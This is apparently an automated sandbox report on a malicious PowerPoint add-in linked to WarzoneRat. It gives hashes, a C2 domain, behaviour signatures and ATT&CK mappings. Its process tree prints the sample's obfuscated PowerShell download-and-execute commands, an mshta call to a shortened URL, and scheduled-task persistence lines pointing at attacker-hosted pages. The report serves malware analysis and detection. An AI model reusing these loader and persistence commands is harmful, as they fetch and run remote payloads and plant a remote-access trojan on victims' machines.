Overview

overview

10

Static

static

IdDetails.ppam

windows7_x64

10

IdDetails.ppam

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    12-07-2021 07:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IdDetails.ppam

  • Size

    14KB

  • MD5

    b3c4df30fcb050cd2719916ca70b730d

  • SHA1

    724d8d16bb272d7a15197caed16aebea4fa8adcd

  • SHA256

    ef1ac3f12332198e1ef6f01698658258289a63e08ff17b1ddba89e229b8f19b7

  • SHA512

    f76708ee0cb319c576eb9cf872620c63d8818566be985eb13c258d736b29b1faf9f6f26159c9caba6bc29cd82316739ad8fff1e4ac47c5ee016cd1a2a0613580

Score
10/10
warzoneratinfostealerrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt

Extracted

Family

warzonerat

C2

normanaman.duckdns.org:3009

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Blocklisted process makes network request 23 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3628
    • C:\Windows\SYSTEM32\mshta.exe
      mshta http://www.bitly.com/ashjdkqowdhqowdh
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:3760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3600
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"
          4⤵
            PID:4660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2144
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            #cmd
            4⤵
              PID:4508
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              #cmd
              4⤵
                PID:4524
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "{path}"
                4⤵
                  PID:4584
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  #cmd
                  4⤵
                    PID:4796
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""
                  3⤵
                  • Creates scheduled task(s)
                  PID:3776
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 3760 -s 2980
                  3⤵
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4360
              • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
                "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3448
                2⤵
                • Process spawned suspicious child process
                • Suspicious use of WriteProcessMemory
                PID:3852
                • C:\Windows\system32\dwwin.exe
                  C:\Windows\system32\dwwin.exe -x -s 3448
                  3⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1856
            • C:\Windows\system32\schtasks.exe
              schtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4716

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Scheduled Task

            1
            T1053

            Persistence

            Scheduled Task

            1
            T1053

            Privilege Escalation

            Scheduled Task

            1
            T1053

            Defense Evasion

            Credential Access

            Discovery

            System Information Discovery

            3
            T1082

            Query Registry

            2
            T1012

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              MD5

              ba0c69ceb0908b193521106967959098

              SHA1

              44ca77c41d4ab2c17df1c831c41900e4f692f8de

              SHA256

              71f2c3e06e74aa830de694c5a96927e37919c322b8e2ace896a87cbf44b32f55

              SHA512

              cf70230fe5dc40ff2b4d03dd9dedd7444f70430e35da55627ec8963244f47dce150e371b5015e508fed11b02a8e84cad240cd6d251dac2df3037ce149d03ca97

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              MD5

              22759294b9639174b8a07a3b58cfa139

              SHA1

              4b39d496092d82dc4e334c90aa29b1025f87ab24

              SHA256

              62e60497f86f6b774f36e67faa9edb13940c367a8da9f4ec691dbb20c6198356

              SHA512

              e37cb0214336795908ffebf7a7edfa2417c56f999fbab93f74c78e2231abbb5bf8b66d73a2c1e309df2d6002678f0a413ffcf68bc048bcaea12e0628716bfc80

              Download Submit
            • C:\Users\Public\lub.vbs
              MD5

              1edd4ddfe49d879dd3c977804a05b9bd

              SHA1

              17157ecc88f381e568f36b9263044450e9dfccbe

              SHA256

              d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa

              SHA512

              6a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df

              Download Submit
            • memory/1856-262-0x0000000000000000-mapping.dmp
              Download
            • memory/2144-269-0x0000000000000000-mapping.dmp
              Download
            • memory/2144-305-0x00000180F4970000-0x00000180F497B000-memory.dmp
              Filesize

              44KB

              Download
            • memory/2144-300-0x00000180F4866000-0x00000180F4868000-memory.dmp
              Filesize

              8KB

              Download
            • memory/2144-298-0x00000180F4863000-0x00000180F4865000-memory.dmp
              Filesize

              8KB

              Download
            • memory/2144-297-0x00000180F4860000-0x00000180F4862000-memory.dmp
              Filesize

              8KB

              Download
            • memory/2144-323-0x00000180F49A0000-0x00000180F49C0000-memory.dmp
              Filesize

              128KB

              Download
            • memory/2144-332-0x00000180F49C0000-0x00000180F49C1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2144-313-0x00000180F4990000-0x00000180F4993000-memory.dmp
              Filesize

              12KB

              Download
            • memory/3600-271-0x0000022FBA990000-0x0000022FBA991000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3600-299-0x0000022FD2EE6000-0x0000022FD2EE8000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3600-264-0x0000000000000000-mapping.dmp
              Download
            • memory/3600-273-0x0000022FD2EE0000-0x0000022FD2EE2000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3600-274-0x0000022FD2EE3000-0x0000022FD2EE5000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3600-281-0x0000022FD2FF0000-0x0000022FD2FF1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3628-118-0x00007FFAAB2C0000-0x00007FFAACE9D000-memory.dmp
              Filesize

              27.9MB

              Download
            • memory/3628-123-0x00007FFAA3B80000-0x00007FFAA5A75000-memory.dmp
              Filesize

              31.0MB

              Download
            • memory/3628-122-0x0000028B0B160000-0x0000028B0C24E000-memory.dmp
              Filesize

              16.9MB

              Download
            • memory/3628-119-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3628-114-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3628-117-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3628-116-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3628-115-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3760-254-0x0000000000000000-mapping.dmp
              Download
            • memory/3776-268-0x0000000000000000-mapping.dmp
              Download
            • memory/3852-282-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3852-287-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3852-285-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3852-283-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp
              Filesize

              64KB

              Download
            • memory/3852-257-0x0000000000000000-mapping.dmp
              Download
            • memory/4524-312-0x0000000000400000-0x000000000055E000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/4524-309-0x0000000000405E28-mapping.dmp
              Download
            • memory/4524-308-0x0000000000400000-0x000000000055E000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/4584-315-0x0000000000405E28-mapping.dmp
              Download
            • memory/4660-320-0x0000000000000000-mapping.dmp
              Download
            • memory/4796-329-0x0000000000405E28-mapping.dmp
              Download